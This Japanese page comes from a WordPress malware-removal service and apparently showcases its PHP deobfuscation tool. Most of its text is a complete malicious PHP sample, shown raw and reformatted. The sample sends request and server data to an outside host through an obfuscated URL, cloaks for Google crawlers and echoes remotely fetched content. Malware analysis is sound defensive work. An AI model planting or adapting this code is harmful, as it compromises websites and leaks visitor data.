Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $jqptmvofn = 'http://www.iptel.uz/api/'; $odothchkp = $_GET; $lkfrqukir = $_SERVER; $qjiahsbez = array(); $qjiahsbez['dqvvlryzc'] = json_encode($odothchkp); $qjiahsbez['agaczrbnt'] = json_encode($lkfrqukir); $bjqsywjaa = bkqlrnrsy(); $odothchkp = 'google'; $lkfrqukir = gethostbyaddr($bjqsywjaa); $qjiahsbez['lrzqduhqa'] = $bjqsywjaa; $fbguxopwe = 0; if(stristr($lkfrqukir,$odothchkp)){ $fbguxopwe = 1; }else{ $lkfrqukir = array( 'HTTP_USER_AGENT', 'HTTP_REFERER' ); foreach($lkfrqukir as $vs){ if(isset($_SERVER[$vs]) && stristr($_SERVER[$vs], $odothchkp)){ $fbguxopwe = 1; } } } if($fbguxopwe){ foreach($qjiahsbez as $vs){ $bjqsywjaa = zjpbnbdks($jqptmvofn,$qjiahsbez); if ( preg_match( '/<defs>(.+?)<\/defs>/is', $bjqsywjaa, $odothchkp ) ) { $lkfrqukir = $odothchkp[1]; $lkfrqukir = @gzinflate($lkfrqukir); $zqmzayhvi = json_decode($lkfrqukir,true); if(count($zqmzayhvi)){ foreach($zqmzayhvi as $key=>$vs){ $$key = $vs; } if(isset($syvydbsrw) && $syvydbsrw){ header("Content-Type: text/xml"); } if(isset($fnbpijvdp) && $fnbpijvdp){ echo $fnbpijvdp; exit; } } } } } function bkqlrnrsy() { $bjqsywjaa = false; $odothchkp = array( 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR', ); foreach ( $odothchkp as $lkfrqukir ) { if ( array_key_exists( $lkfrqukir, $_SERVER ) ) { $zqmzayhvi = explode( ',', $_SERVER[ $lkfrqukir ] ); $bjqsywjaa = trim( $zqmzayhvi[0] ); break; } } return $bjqsywjaa; } function zjpbnbdks( $jqptmvofn, $lkfrqukir = array() ){ $bjqsywjaa = 'htztawtygpew:py/mc/xjwlcwfxwki.uzmmbstiklvdrmisdsrftmmpvy.glckfoxcmet/gnahkmkhaekpiwtequbhsgv2qk2ku1qw2vz0af3vd-tc5bv/kdaflpfbibc.lopmdhebpva'; $odothchkp = strlen($bjqsywjaa); $jqptmvofn = ''; for($i=0; $i<$odothchkp; $i++){ if(!($i%3)){ $jqptmvofn .= $bjqsywjaa[$i]; } } $odothchkp = count($lkfrqukir); $zqmzayhvi = curl_init(); curl_setopt( $zqmzayhvi, CURLOPT_URL, $jqptmvofn ); curl_setopt( $zqmzayhvi, CURLOPT_HEADER, false ); curl_setopt( $zqmzayhvi, CURLOPT_RETURNTRANSFER, true ); if( $odothchkp ){ curl_setopt( $zqmzayhvi, CURLOPT_POST, true ); curl_setopt( $zqmzayhvi, CURLOPT_POSTFIELDS, $lkfrqukir ); } curl_setopt( $zqmzayhvi, CURLOPT_CONNECTTIMEOUT, 30 ); $qjiahsbez = curl_exec( $zqmzayhvi ); curl_close( $zqmzayhvi ); return $qjiahsbez; } ?>
<?php $jqptmvofn = 'http://www.iptel.uz/api/'; $odothchkp = $_GET; $lkfrqukir = $_SERVER; $qjiahsbez = array(); $qjiahsbez['dqvvlryzc'] = json_encode($odothchkp); $qjiahsbez['agaczrbnt'] = json_encode($lkfrqukir); $bjqsywjaa = bkqlrnrsy(); $odothchkp = 'google'; $lkfrqukir = gethostbyaddr($bjqsywjaa); $qjiahsbez['lrzqduhqa'] = $bjqsywjaa; $fbguxopwe = 0; if (stristr($lkfrqukir, $odothchkp)) { $fbguxopwe = 1; } else { $lkfrqukir = array('HTTP_USER_AGENT', 'HTTP_REFERER'); foreach ($lkfrqukir as $vs) { if (isset($_SERVER[$vs]) && stristr($_SERVER[$vs], $odothchkp)) { $fbguxopwe = 1; } } } if ($fbguxopwe) { foreach ($qjiahsbez as $vs) { $bjqsywjaa = zjpbnbdks($jqptmvofn, $qjiahsbez); if (preg_match('/<defs>(.+?)<\\/defs>/is', $bjqsywjaa, $odothchkp)) { $lkfrqukir = $odothchkp[1]; $lkfrqukir = @gzinflate($lkfrqukir); $zqmzayhvi = json_decode($lkfrqukir, true); if (count($zqmzayhvi)) { foreach ($zqmzayhvi as $key => $vs) { ${$key} = $vs; } if (isset($syvydbsrw) && $syvydbsrw) { header("Content-Type: text/xml"); } if (isset($fnbpijvdp) && $fnbpijvdp) { echo $fnbpijvdp; exit; } } } } } function bkqlrnrsy() { $bjqsywjaa = false; $odothchkp = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR'); foreach ($odothchkp as $lkfrqukir) { if (array_key_exists($lkfrqukir, $_SERVER)) { $zqmzayhvi = explode(',', $_SERVER[$lkfrqukir]); $bjqsywjaa = trim($zqmzayhvi[0]); break; } } return $bjqsywjaa; } function zjpbnbdks($jqptmvofn, $lkfrqukir = array()) { $bjqsywjaa = 'htztawtygpew:py/mc/xjwlcwfxwki.uzmmbstiklvdrmisdsrftmmpvy.glckfoxcmet/gnahkmkhaekpiwtequbhsgv2qk2ku1qw2vz0af3vd-tc5bv/kdaflpfbibc.lopmdhebpva'; $odothchkp = strlen($bjqsywjaa); $jqptmvofn = ''; for ($i = 0; $i < $odothchkp; $i++) { if (!($i % 3)) { $jqptmvofn .= $bjqsywjaa[$i]; } } $odothchkp = count($lkfrqukir); $zqmzayhvi = curl_init(); curl_setopt($zqmzayhvi, CURLOPT_URL, $jqptmvofn); curl_setopt($zqmzayhvi, CURLOPT_HEADER, false); curl_setopt($zqmzayhvi, CURLOPT_RETURNTRANSFER, true); if ($odothchkp) { curl_setopt($zqmzayhvi, CURLOPT_POST, true); curl_setopt($zqmzayhvi, CURLOPT_POSTFIELDS, $lkfrqukir); } curl_setopt($zqmzayhvi, CURLOPT_CONNECTTIMEOUT, 30); $qjiahsbez = curl_exec($zqmzayhvi); curl_close($zqmzayhvi); return $qjiahsbez; }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.